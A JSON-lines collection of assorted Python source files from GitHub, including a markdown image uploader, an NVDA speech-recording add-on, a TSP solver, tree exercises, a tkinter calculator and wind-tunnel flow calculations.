__init__(self, riskmodels):\n self.riskmodels = riskmodels\n\n def pre_evaluation(self, universe, backtest_times):\n \"\"\"Initialize objects.\"\"\"\n for risk in self.riskmodels:\n risk.pre_evaluation(universe, backtest_times)\n\n def values_in_time(self, **kwargs):\n \"\"\"Update parameters.\"\"\"\n for risk in self.riskmodels:\n risk.values_in_time(**kwargs)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n risks = [risk.compile_to_cvxpy(w_plus, z, w_plus_minus_w_bm)\n for risk in self.riskmodels]\n return cp.max(cp.hstack(risks))\n","repo_name":"danishdalim/cvxportfolio","sub_path":"cvxportfolio/risks.py","file_name":"risks.py","file_ext":"py","file_size_in_byte":17201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"15400293143","text":"from sklearn.cluster import KMeans\n\nimport matplotlib as mpl\nmpl.use('TkAgg')\n\nimport cv2\n\ndef kmeansclustering(image, k):\n # Convert from BGR to LAB\n image = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n\n # Convert to list of pixels for clustering\n pixellist = image.reshape((image.shape[0] * image.shape[1], 3))\n\n # Perform kmeans clustering\n cluster = KMeans(n_clusters=k)\n labels = cluster.fit_predict(pixellist)\n quant = cluster.cluster_centers_.astype(\"uint8\")[labels]\n\n # Reshape feature vectors back to form the image\n quant = quant.reshape((image.shape[0], image.shape[1], 3))\n\n # Convert from LAB to RGB\n quant = cv2.cvtColor(quant, cv2.COLOR_LAB2RGB)\n\n return quant","repo_name":"margaretpearce/cs766-project","sub_path":"app/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20527898505","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport requests\nimport json\n\nDIR_PATH = \"C:\\\\WebSecurity\\\\hvv\\\\笔记\\\\hvv\"# os.path.abspath(os.path.dirname(__file__)) \nL_cur = 2 \nR_cur = 1 \nimage_local_add = 'C:'\nimage_remote_add = 'https://'\nfile_data_cache = \"\"\nlog_data_cache = \"\" #日志缓存\n\ndef file_update(file):\n os.chdir(DIR_PATH)\n with open(file, 'w', encoding='utf-8') as fw:\n fw.write(file_data_cache)\n fw.close\n\ndef image_upload():\n data = json.dumps({'list': [image_local_add]})\n response = requests.post(url='http://127.0.0.1:36677/upload', data = data)\n return response\n\nif __name__ == '__main__':\n log_file = open(\"log.txt\", \"r+\",encoding=\"utf-8\")\n log_data_cache += log_file.read()\n files = os.listdir(DIR_PATH)\n os.chdir(DIR_PATH)\n file_num = 0\n for file in files: #处理目录下每个文件\n\n if (not os.path.isdir(file) and file[-3:] == '.md'): \n file_num += 1\n file_data_cache = \"\"\n with open(file,'r',encoding = 'utf-8') as f:\n line_num = 0\n for line in f: \n if (line.find('![image') != -1 and line.find(\"http\") == -1):\n L_cur = line.find('(') + 1\n R_cur = line.find(')')\n image_local_add = line[L_cur:R_cur]\n # print(image_local_add)\n line_num += 1\n log_data_cache += \"uploading:正在上传第\" + str(file_num) + \"个文件\\'\" + file + \"\\'的第\" + str(line_num) + \"张图片......\"\n print(\"uploading:正在上传第\" + str(file_num) + \"个文件\\'\" + file + \"\\'的第\" + str(line_num) + \"张图片......\")\n response = image_upload() # 上传\n # print(type(response.text))\n # print(response.text)\n if(response.text.find('false') != -1): # 报错\n log_data += \"Upload fail! PicGo upload error!\\nPlease check your PicGo setting and web connection!\\n\"\n print(\"Upload fail! PicGo upload error!\\nPlease check your PicGo setting and web connection!\\n\")\n print(image_local_add)\n else:\n log_data += \"Upload Success!\"\n print(\"Upload Success!\")\n image_remote_add = response.text[response.text.find('https://'):response.text.find(\"\\\"]}\")]\n # print(image_remote_add)\n line = line.replace(image_local_add,image_remote_add)\n file_data_cache += line\n f.close()\n file_update(file) \n log_file.write(log_data_cache)\n log_file.close()","repo_name":"Lq0ne/md_pic_online","sub_path":"md_pic_online.py","file_name":"md_pic_online.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12101551613","text":"import globalPluginHandler\ntry:\n\timport speech.speech as speech\nexcept ModuleNotFoundError:\n\timport speech\nimport speechViewer\nimport gui\nimport core\nimport ui\nimport api\nimport os\nimport wx\nimport globalVars\nimport time\nfrom scriptHandler import script\nimport addonHandler\n# Start the translation process\naddonHandler.initTranslation()\n\nstart = False\noldSpeak = speech.speak\ncontents = \"\"\n\n# In the original work the file was stored in a path not easily accessed by the normal user, due to translation of the folder name in, at least, Windows 10 in portuguese...\n_NRIniFile = os.path.join(globalVars.appArgs.configPath,\"NVDARecord.txt\")\n\ndef getSequenceText(sequence):\n\treturn speechViewer.SPEECH_ITEM_SEPARATOR.join([x for x in sequence if isinstance(x, str)])\n\ndef mySpeak(sequence, *args, **kwargs):\n\tglobal contents\n\toldSpeak(sequence, *args, **kwargs)\n\ttext = getSequenceText(sequence)\n\tif text:\n\t\tif \"\\n\" not in text:\n\t\t\ttext += \"\\n\"\n\t\tcontents += text\n\n\nclass GlobalPlugin(globalPluginHandler.GlobalPlugin):\n\t# Creating the constructor of the newly created GlobalPlugin class.\n\tdef __init__(self):\n\t\t# Call of the constructor of the parent class.\n\t\tsuper(GlobalPlugin, self).__init__()\n\t\t# Avoid use in secure screens\n\t\tif globalVars.appArgs.secure:\n\t\t\treturn\n\n\t@script(\n\t# Translators: Message to be announced during Keyboard Help\n\tdescription=_(\"Activate/deactivate recording on NVDARecorder\"),\n\tgesture=\"kb:alt+numpadplus\")\n\tdef script_record(self, gesture):\n\t\tglobal start\n\t\tstart = not start\n\t\tif not start:\n\t\t\tspeech.speak = oldSpeak\n\t\t\tglobal contents\n\t\t\twith open(_NRIniFile, \"w\", encoding = \"utf-8\") as file:\n\t\t\t\tfile.write(contents)\n\t\t\t\tfile.close()\n\t\t\t\tglobal recorded\n\t\t\t\trecorded = contents\n\t\t\t\tgui.mainFrame._popupSettingsDialog(ShowResults)\n\t\t\tui.message(_(\"Recording stopped\"))\n\t\t\tcontents = \"\"\n\t\telse:\n\t\t\tui.message(_(\"Start recording\"))\n\t\t\tspeech.speak = mySpeak\n\n\nclass ShowResults(wx.Dialog):\n\tdef __init__(self, *args, **kwds):\n\t\tkwds[\"style\"] = kwds.get(\"style\", 0) | wx.DEFAULT_DIALOG_STYLE\n\t\twx.Dialog.__init__(self, *args, **kwds)\n\t\tself.SetTitle(_(\"NVDA recorder\"))\n\n\t\tsizer_1 = wx.BoxSizer(wx.VERTICAL)\n\n\t\t# Translators: Static text announcing the results\n\t\tlabel_1 = wx.StaticText(self, wx.ID_ANY, _(\"Here is the recorded text:\"))\n\t\tsizer_1.Add(label_1, 0, 0, 0)\n\n\t\tglobal contents\n\t\tself.text_ctrl_1 = wx.TextCtrl(self, wx.ID_ANY, recorded, size = (550, 350), style=wx.TE_MULTILINE | wx.TE_READONLY)\n\t\tsizer_1.Add(self.text_ctrl_1, 0, 0, 0)\n\n\t\tsizer_2 = wx.StdDialogButtonSizer()\n\t\tsizer_1.Add(sizer_2, 0, wx.ALIGN_RIGHT | wx.ALL, 4)\n\n\t\t# Translators: Name of button to open the TXT file folder\n\t\tself.button_1 = wx.Button(self, wx.ID_ANY, _(\"Open NVDARecord.txt's folder\"))\n\t\tself.button_1.SetDefault()\n\t\tsizer_2.Add(self.button_1, 0, 0, 0)\n\n\t\t# Translators: Name of button that allows to copy results to clipboard\n\t\tself.button_SAVE = wx.Button(self, wx.ID_ANY, _(\"Copy to clipboard\"))\n\t\tsizer_2.Add(self.button_SAVE, 0, 0, 0)\n\n\t\tself.button_CLOSE = wx.Button(self, wx.ID_CLOSE, \"\")\n\t\tsizer_2.AddButton(self.button_CLOSE)\n\n\t\tsizer_2.Realize()\n\n\t\tself.SetSizer(sizer_1)\n\t\tsizer_1.Fit(self)\n\n\t\tself.SetEscapeId(self.button_CLOSE.GetId())\n\t\tself.Bind(wx.EVT_BUTTON, self.openFolder, self.button_1)\n\t\tself.Bind(wx.EVT_BUTTON, self.copyToClip, self.button_SAVE)\n\t\tself.Bind(wx.EVT_BUTTON, self.quit, self.button_CLOSE)\n\n\t\tself.Layout()\n\t\tself.CentreOnScreen()\n\n\tdef openFolder(self, event):\n\t\tself.Destroy()\n\t\tevent.Skip()\n\t\tos.startfile(os.path.join(globalVars.appArgs.configPath))\n\n\tdef copyToClip(self, event):\n\t\tevent.Skip()\n\t\t# Copy result to clipboard\n\t\tapi.copyToClip(recorded)\n\n\tdef quit(self, event):\n\t\tself.Destroy()\n\t\tevent.Skip()\n\n","repo_name":"ruifontes/NVDARecorder","sub_path":"addon/globalPlugins/NVDARecorder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43955105821","text":"# See README.md for description\nimport os\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# Import data\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_file = os.path.join(ROOT_DIR, \"Algo\", \"data\", \"test1.csv\")\nadj = pd.read_csv(data_file, header=None)\nadj = adj.to_numpy()\n\n\ndef cost(adj, cycle):\n cost = 0\n for i, node in enumerate(cycle[:-1]):\n next_node = cycle[i + 1]\n cost += adj[node][next_node]\n return cost\n\ndef shortcutting(circuit):\n nodes = []\n for u, v in circuit:\n if not nodes:\n nodes.append(u)\n if v not in nodes:\n nodes.append(v)\n nodes.append(nodes[0])\n return nodes\n\ndef christofides_impl(G, weight=\"weight\"):\n loop_nodes = (n for n, neighbors in G.adj.items() if n in neighbors)\n try:\n node = next(loop_nodes)\n except StopIteration:\n pass\n else:\n G = G.copy()\n G.remove_edge(node, node)\n G.remove_edges_from((n, n) for n in loop_nodes)\n check = False\n for n,ndict in G.adj.items():\n if len(ndict)!=len(G)-1:\n check=True\n break\n if check:\n raise nx.NetworkXError(\"G must be a complete graph.\")\n tree = nx.minimum_spanning_tree(G)\n L = G.copy()\n nodes = []\n for v,degree in (tree.degree):\n if degree%2==0: \n nodes.append(v)\n L.remove_nodes_from(nodes)\n MG = nx.MultiGraph()\n MG.add_edges_from(tree.edges)\n edges = nx.min_weight_matching(L)\n MG.add_edges_from(edges)\n return shortcutting(nx.eulerian_circuit(MG))\n\ndef christofides(adj=adj):\n\n G = nx.from_numpy_array(adj)\n pos = nx.spring_layout(G, scale=2)\n\n pos[0] = (0.5, 0.5)\n\n cycle = christofides_impl(G)\n edge_list = list(nx.utils.pairwise(cycle))\n\n nx.draw_networkx(\n G,\n pos,\n with_labels=True,\n edgelist=edge_list,\n edge_color=\"red\",\n node_size=200,\n width=1,\n )\n print(f\"The order of traversal is: {cycle}\")\n print(f\"The cost of the traversal is: {cost(adj, cycle)}\")\n return cycle, cost(adj, cycle)\n # plt.show()\n\n\ndef main():\n christofides(adj)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"YBenPan/TSP_NYC","sub_path":"Algo/christofides.py","file_name":"christofides.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26665978264","text":"# Tree traversal\r\n# Build tree from inorder,preorder\r\n\r\nclass Node:\r\n def __init__(self,key):\r\n self.value=key\r\n self.left=None\r\n self.right=None\r\n \r\n \r\n#Find max and min elem in BT\r\ndef find_max_min(root):\r\n minimum =65635 \r\n \r\n if(root is not None):\r\n root_val=root.value\r\n left=find_max_min(root.left)\r\n right=find_max_min(root.right)\r\n if(left > right):\r\n minimum=right\r\n \r\n else:\r\n minimum=left\r\n \r\n if(root_val < minimum):\r\n minimum=root_val\r\n \r\n \r\n return minimum\r\n \r\n#HEight of a tree or max dept og a tree\r\ndef height_of_a_tree(root):\r\n if(root is None):\r\n return 0\r\n else:\r\n left=height_of_a_tree(root.left)\r\n right=height_of_a_tree(root.right)\r\n \r\n height=max(left,right)\r\n return height + 1\r\n \r\n#Find minimum depth of a binary tree\r\ndef minDepth(root):\r\n if root == None:\r\n return 0\r\n if root.left==None or root.right==None:\r\n return minDepth(root.left)+minDepth(root.right)+1\r\n return min(minDepth(root.right),minDepth(root.left))+1\r\n \r\ndef find_deepest_node_in_a_tree(root,height):\r\n if(root is None):\r\n return None\r\n else:\r\n if(height==1):\r\n x=root.value\r\n return x\r\n else:\r\n find_deepest_node_in_a_tree(root.left,height - 1)\r\n find_deepest_node_in_a_tree(root.right,height - 1)\r\n \r\n \r\n#Find leaves in a binary tree:\r\ndef find_leaves_BT(root):\r\n if root is None:\r\n return 0\r\n \r\n res=0\r\n if root.left is None and root.right is None:\r\n print(root.value)\r\n res+=1\r\n \r\n \r\n res+= find_leaves_BT(root.left) + find_leaves_BT(root.right)\r\n return res\r\n \r\n \r\n#Find full nodes in a binary tree:\r\ndef find_full_nodes_BT(root):\r\n if root is None:\r\n return 0\r\n \r\n res=0\r\n if root.left and root.right:\r\n print(root.value)\r\n res+=1\r\n \r\n \r\n res+=find_full_nodes_BT(root.left) + find_full_nodes_BT(root.right)\r\n \r\n return res\r\n \r\n \r\ncount=0\r\nroot=Node(1)\r\nroot.left=Node(2)\r\nroot.right=Node(3)\r\nroot.left.left=Node(4)\r\nroot.left.right=Node(5)\r\nroot.right.left=Node(6)\r\nroot.right.right=Node(7)\r\n#root.right.right.right=Node(8)\r\nmaximum=find_max_min(root)\r\n#print(maximum)\r\nheight=height_of_a_tree(root)\r\nprint(\"Height\"+str(height))\r\nminDepth=minDepth(root)\r\n#print(minDepth)\r\nnode_in_deepest_level=find_deepest_node_in_a_tree(root,height)\r\nprint(node_in_deepest_level)\r\nprint(\"Leaves\")\r\ncount=find_leaves_BT(root)\r\nprint(\"COunt\"+str(count))\r\nfullnodes=find_full_nodes_BT(root)\r\nprint(\"Full Nodes\"+str(fullnodes))\r\n","repo_name":"spurthirao999/DataStructures","sub_path":"MIn_MAX_TREE.py","file_name":"MIn_MAX_TREE.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3879727920","text":"#Rakesh kumar khetwal\n#On button not in use sorry\nimport tkinter as tk #creating alias of tkinter\nfrom tkinter import font\nx=[]\nclass MyUI(tk.Frame): #tk.frame is predefined class and acting as a base class\n def __init__(self,master=None): # here master and self are not the the argumentt taken from the base class tk.Frame \n super().__init__(master) # here the __init__() is a function inside the tk.Frame base class\n self.pack() # render or create the frame , where pack is in-built function\n self.create_widgets()\n \n def nik(self,tex,tv,his):\n \n return lambda : self.calc(tex,tv,his)\n\n def calc(self,tex,tv,his):\n tex.insert(tk.END, tv)\n if tv.find('DEL')!=-1:\n his.insert(tk.END,'\\n')\n elif tv.find('AC')!=-1:\n his.insert(tk.END,'\\n')\n else:\n his.insert(tk.END,tv)\n \n \n x.append(tv) \n y=''.join(x) # for concatenating the list into single string\n try: \n if y.find('=')!=-1:\n tex.delete('1.0', tk.END)\n y=y.replace('=','')\n y=y.replace('Ans','')\n if y.find(\"/\")!=-1: \n s=y.split('/')\n z=len(s)\n print(z)\n if float(s[1])!=0.0:\n suma=float(s[0])/float(s[1])\n tex.insert(tk.END, suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n print(\"Division of nos\",suma)\n x[:]=[]\n x.append(suma)\n else:\n his.insert(tk.END,'Math error')\n tex.insert(tk.END,'Math error')\n \n elif y.find(\"X\")!=-1: # for multiplication\n suma=1\n \n s=y.split('X')\n \n z=len(s)\n print(z)\n for i in range(0,z):\n suma=suma*float(s[i])\n tex.insert(tk.END, suma)\n print(\"multiplication of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n\n elif y.find(\"+\")!=-1: # for addition\n suma=0\n \n s=y.split('+')\n \n z=len(s)\n print(z)\n for i in range(0,z):\n suma=suma+float(s[i])\n tex.insert(tk.END, suma)\n print(\"sum of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n\n elif y.find(\"-\")!=-1:\n s=y.split('-')\n z=len(s)\n print(z)\n suma=float(s[0])-float(s[1])\n tex.insert(tk.END, suma)\n print(\"subtraction of nos\",suma)\n suma=float(suma)\n his.insert(tk.END,suma)\n his.insert(tk.END,'\\n')\n suma=str(suma)\n x[:]=[]\n x.append(suma)\n \n elif y.find(\"DEL\")!=-1: # for deletion\n x[:]=[]\n tex.delete('1.0', tk.END)\n return\n \n elif y.find(\"AC\")!=-1: # for deletion\n x[:]=[]\n tex.delete('1.0', tk.END)\n return\n \n except:\n None\n \n def create_widgets(self): # for creating wizards\n # can't use grid and pack in same function\n h =font.Font(family='Helvetica', size=36, weight=font.BOLD)# here Font is a function inbuilt inside the from tkinter import font and font is a function inside tinkter\n #making of text box\n cc=font.Font(family='Helvetica', size=20, weight=font.BOLD)\n xx=font.Font(family='Helvetica', size=25, weight=font.BOLD)\n self.shows=tk.Text(self,width=21,font=xx,height=1,fg='black',bg='light blue')\n self.shows.insert(tk.END,'Rakesh Kumar Khetwal')\n self.shows.grid(row=0,column=5)\n #Output Box\n self.show = tk.Text(self,width=25,height=1.5,bg='brown',fg='white',font=cc) \n self.show.grid(row=3, column=5,rowspan=5,columnspan=5)\n # Histroy box\n self.his=tk.Text(self,width=15,height=7,bg='brown',fg='white',font=cc)\n self.his.grid(row=0,column=5,rowspan=5,columnspan=7)\n self.his.insert(tk.END,\"-------Histroy-------\")\n \n #For creating the buttons\n self.a = tk.Button(self,text=\"7\",fg=\"white\",bg=\"black\",font=h,height=0,width=0)\n tv=self.a[\"text\"]\n self.a[\"command\"] = self.nik(self.show,tv,self.his)\n self.a.grid(column=0, row=0,padx=(2,2),pady=(2,2))\n\n #Unsuccessful attempts for inputing the value inside the text inside gui frame\n #self.a[\"command\"]=self.extract(tv)\n # xx=self.show.insert(tk.END,self.a['text'])\n # self.a[\"command\"] = print(self.a['text'])\n #self.a.bind('<Button-1>', y.insert(tk.END,gg))\n #self.show['text']=\"7\";\n #self.show.insert('1.0','vv')\n \n self.b = tk.Button(self,text=\"8\",fg=\"white\",bg=\"black\",font=h)\n tv=self.b[\"text\"]\n self.b[\"command\"] = self.nik(self.show,tv,self.his)\n self.b.grid(column=1, row=0,padx=(2,2),pady=(2,2))\n \n self.c = tk.Button(self,text=\"9\",fg=\"white\",bg=\"black\",font=h)\n tv=self.c[\"text\"]\n self.c[\"command\"] = self.nik(self.show,tv,self.his)\n self.c.grid(column=2, row=0,padx=(2,2),pady=(2,2))\n\n self.k = tk.Button(self,text=\"DEL\",fg=\"white\",bg=\"red\",font=h,width=4)\n tv=self.k[\"text\"]\n self.k[\"command\"] = self.nik(self.show,tv,self.his)\n self.k.grid(column=3, row=0,padx=(2,2),pady=(2,2))\n\n self.l = tk.Button(self,text=\"AC\",fg=\"white\",bg=\"red\",font=h,width=4) \n tv=self.l[\"text\"]\n self.l[\"command\"] = self.nik(self.show,tv,self.his)\n self.l.grid(column=4, row=0,padx=(2,2),pady=(2,2))\n\n self.d = tk.Button(self,text=\"4\",fg=\"white\",bg=\"black\",font=h)\n tv=self.d[\"text\"]\n self.d[\"command\"] = self.nik(self.show,tv,self.his)\n self.d.grid(column=0, row=1,padx=(2,2),pady=(2,2))\n \n self.e = tk.Button(self,text=\"5\",fg=\"white\",bg=\"black\",font=h)\n tv=self.e[\"text\"]\n self.e[\"command\"] = self.nik(self.show,tv,self.his)\n self.e.grid(column=1, row=1,padx=(2,2),pady=(2,2)) \n\n self.f = tk.Button(self,text=\"6\",fg=\"white\",bg=\"black\",font=h)\n tv=self.f[\"text\"]\n self.f[\"command\"] = self.nik(self.show,tv,self.his)\n self.f.grid(column=2, row=1,padx=(2,2),pady=(2,2))\n\n self.m = tk.Button(self,text=\"X\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.m[\"text\"]\n self.m[\"command\"] = self.nik(self.show,tv,self.his)\n self.m.grid(column=3, row=1,padx=(2,2),pady=(2,2))\n\n self.n = tk.Button(self,text=\"/\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.n[\"text\"]\n self.n[\"command\"] = self.nik(self.show,tv,self.his)\n self.n.grid(column=4, row=1,padx=(2,2),pady=(2,2))\n\n self.g = tk.Button(self,text=\"1\",fg=\"white\",bg=\"black\",font=h) \n tv=self.g[\"text\"]\n self.g[\"command\"] = self.nik(self.show,tv,self.his)\n self.g.grid(column=0, row=2,padx=(2,2),pady=(2,2))\n \n self.h = tk.Button(self,text=\"2\",fg=\"white\",bg=\"black\",font=h)\n tv=self.h[\"text\"]\n self.h[\"command\"] = self.nik(self.show,tv,self.his)\n self.h.grid(column=1, row=2,padx=(2,2),pady=(2,2))\n\n self.i = tk.Button(self,text=\"3\",fg=\"white\",bg=\"black\",font=h) \n tv=self.i[\"text\"]\n self.i[\"command\"] = self.nik(self.show,tv,self.his)\n self.i.grid(column=2, row=2,padx=(2,2),pady=(2,2))\n\n self.o = tk.Button(self,text=\"+\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.o[\"text\"]\n self.o[\"command\"] = self.nik(self.show,tv,self.his)\n self.o.grid(column=3, row=2,padx=(2,2),pady=(2,2))\n\n self.p = tk.Button(self,text=\"-\",fg=\"white\",bg=\"light green\",font=h,width=4) \n tv=self.p[\"text\"]\n self.p[\"command\"] = self.nik(self.show,tv,self.his)\n self.p.grid(column=4, row=2,padx=(2,2),pady=(2,2))\n\n self.q = tk.Button(self,text=\"0\",fg=\"white\",bg=\"black\",font=h) \n tv=self.q[\"text\"]\n self.q[\"command\"] = self.nik(self.show,tv,self.his)\n self.q.grid(column=0, row=3,padx=(2,2),pady=(2,2))\n\n z =font.Font(family='Helvetica', size=36, weight=font.BOLD)\n self.r = tk.Button(self,text=\".\",fg=\"white\",bg=\"black\",font=z,width=2)\n tv=self.r[\"text\"]\n self.r[\"command\"] = self.nik(self.show,tv,self.his)\n self.r.grid(column=1, row=3,padx=(2,2),pady=(2,2)) \n\n self.t = tk.Button(self,text=\"=\",fg=\"white\",bg=\"orange\",font=h) \n self.t.grid(column=2, row=3,padx=(2,2),pady=(2,2))\n tv=self.t[\"text\"]\n self.t[\"command\"] = self.nik(self.show,tv,self.his)\n \n self.u = tk.Button(self,text=\"Ans\",fg=\"white\",bg=\"orange\",font=h,width=4) \n tv=self.u[\"text\"]\n self.u[\"command\"] = self.nik(self.show,tv,self.his)\n self.u.grid(column=3, row=3,padx=(2,2),pady=(2,2))\n\n self.w = tk.Button(self,text=\"ON\",fg=\"white\",bg=\"brown\",font=h,width=4) \n tv=self.w[\"text\"]\n self.w[\"command\"] = self.nik(self.show,tv,self.his)\n self.w.grid(column=4, row=3,padx=(2,2),pady=(2,2))\n\nroot = tk.Tk() # create frame\napp = MyUI(master=root) #master here is used to for storing the layouts after each function basically \napp.mainloop()\n","repo_name":"rakeshkhetwal/Calculator-on-tkinter-python","sub_path":"final calculator.py","file_name":"final calculator.py","file_ext":"py","file_size_in_byte":9859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3609000848","text":"import flowtools\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n\r\n'''Step 1 - Measure reference pressure ratio at x_0, ppt_x0'''\r\npx0pt = 0.893 #0.781381 #Measured reference pressure ratio at x = 0 (change this to the correct value) \r\n#0.776 is the lowest it goes without giving an error (if you go lower then in flowtools you are taking the square root of a negative number somewhere in the calculation)\r\n\r\n\r\n\r\n'''Step 2 - Calculate local M and A(x_0) / A* using flowtools.py'''\r\nM_x0 = flowtools.flowisentropic2(1.4, px0pt, \"pres\")[0]\r\nAx0Astar = flowtools.flowisentropic2(1.4, px0pt, \"pres\")[4]\r\n\r\n\r\n\r\n'''Step 3 - Determine A(x_0) / A_t from given wind tunnel geometry'''\r\nAx0At = 1.175 #Using x_0 = 44.8 [mm] (first entry in Chapter 4, Table 1)\r\n\r\n\r\n'''Step 4 - Find A_t / A* (correction coefficient)'''\r\ncoeff = Ax0Astar / Ax0At\r\n\r\n\r\n\r\n'''Step 5 - For each value of x, determine A(x) / A_t from given wind tunnel geometry'''\r\nwith open(\"table1manual.txt\", \"r\") as file:\r\n lines = file.readlines()\r\n\r\nx_list = []\r\nAAt_list = []\r\n\r\nfor line in lines:\r\n if line != \"\" and line[0] != \"x\": \r\n numbers = line.split(\" \") \r\n x_list.append(float(numbers[0]))\r\n AAt_list.append(float(numbers[2]))\r\n\r\n\r\n\r\n'''Step 6 - For each value of x, calculate A(x) / A*'''\r\nAAstar_list = []\r\nfor i in AAt_list:\r\n AAstar_list.append(float(coeff * i))\r\n print(float(coeff * i))\r\n\r\nprint(\"coeff =\", coeff)\r\n\r\n\r\n'''Step 7 - For each value of x, find M(x) and p(x)/p_t using flowtools.py'''\r\nM_list = []\r\nppt_list = []\r\nfor i in AAstar_list:\r\n M = flowtools.flowisentropic2(1.4, i, \"sub\")[0]\r\n M_list.append(M)\r\n ppt = flowtools.flowisentropic2(1.4, i, \"sub\")[2]\r\n ppt_list.append(ppt)\r\n print(M)\r\n\r\n\r\n\r\n'''Plot'''\r\nplt.plot(x_list, M_list, \"black\", marker = \"o\", markersize = 5, markerfacecolor = \"none\", markeredgecolor = \"black\")\r\nplt.plot(x_list, ppt_list, \"red\", marker = \"o\", markersize = 5, markerfacecolor = \"none\", markeredgecolor = \"red\")\r\nplt.xlabel(\"x [mm]\")\r\nplt.ylabel(\"M [-], p/p$_t$ [-]\")\r\nplt.xlim(40, 200)\r\nplt.ylim(0, 1.1)\r\nplt.grid()\r\nplt.legend([\"Mach number\", \"Pressure ratio\"])\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AlexisVandenHeede/HighSpeedWindTunnelTest","sub_path":"subsonic_correction.py","file_name":"subsonic_correction.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38461574458","text":"import pixelhouse.pixelhouse as ph\nimport glob, os\nimport pyflow\nfrom tqdm import tqdm\nfrom PIL import Image\nimport numpy as np\nimport time\n\nF_FRAMES = sorted(glob.glob(\"data/frames/*\"))[3072:]\n\nsave_dest = \"data/flows\"\nos.system(f'mkdir -p {save_dest}')\n\n# Flow Options:\nalpha = 0.05 ## SCALE PARAM\nratio = 0.75\nminWidth = 200\nnOuterFPIterations = 1\nnInnerFPIterations = 1\nnSORIterations = 1\ncolType = 0 # 0 or default:RGB, 1:GRAY (but pass gray image with shape (h,w,1))\n\nfrac = 0.25\nfrac = 0.5\nfor f0, f0b in zip(tqdm(F_FRAMES), F_FRAMES[1:]):\n\n #print(f0)\n \n f1 = os.path.join(save_dest, os.path.basename(f0)) + '.npy'\n\n #im1 = np.array(Image.open(f0))\n #im2 = np.array(Image.open(f0b))\n\n im1 = ph.load(f0)\n im2 = ph.load(f0b)\n img = im1.copy()\n img.img = np.abs(im1.img-im2.img)\n\n img.show()\n continue\n exit()\n\n im1 = ph.load(f0).resize(frac).rgb\n im2 = ph.load(f0b).resize(frac).rgb\n \n im1 = im1.astype(float) / 255.\n im2 = im2.astype(float) / 255.\n\n s = time.time()\n u, v, im2W = pyflow.coarse2fine_flow(\n im1, im2, alpha, ratio, minWidth, nOuterFPIterations,\n nInnerFPIterations,\n nSORIterations, colType)\n e = time.time()\n print('Time Taken: %.2f seconds for image of size (%d, %d, %d)' % (\n e - s, im1.shape[0], im1.shape[1], im1.shape[2]))\n flow = np.concatenate((u[..., None], v[..., None]), axis=2)\n print(flow, flow.shape)\n np.save(f1, flow)\n #np.save('examples/outFlow.npy', flow)\n\n import cv2\n hsv = np.zeros(im1.shape, dtype=np.uint8)\n hsv[:, :, 0] = 255\n hsv[:, :, 1] = 255\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)\n rgb = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\n\n print(mag, mag.shape)\n mag = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)\n #mag = np.clip(100*mag, 0, 255)\n #mag = mag.astype(np.uint8)\n print(mag.shape)\n print(mag)\n \n canvas = ph.Canvas()\n canvas.img = np.dstack([mag,mag,mag,])\n canvas.resize(1.0).show()\n #exit()\n","repo_name":"thoppe/NewNewYork","sub_path":"P2_flowmaps.py","file_name":"P2_flowmaps.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16686578602","text":"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom regex import F, P\r\nimport image as m\r\nimport pyttsx3\r\nfrom colorama import Back ,Fore,Style\r\nengine = pyttsx3.init()\r\nengine.setProperty('rate',130)\r\n\r\nclass color:\r\n def ColorCar(dim):\r\n im=m.name\r\n image = cv2.imread(im)\r\n image=cv2.resize(image,(300,300),cv2.INTER_AREA)\r\n # create NumPy arrays from the boundaries\r\n lower_red= np.array([17,15,100], dtype = \"uint8\")\r\n upper_red= np.array([33,33,255], dtype = \"uint8\")\r\n \r\n lower_blue= np.array([66,27,0], dtype = \"uint8\")\r\n upper_blue= np.array([255,243,69], dtype = 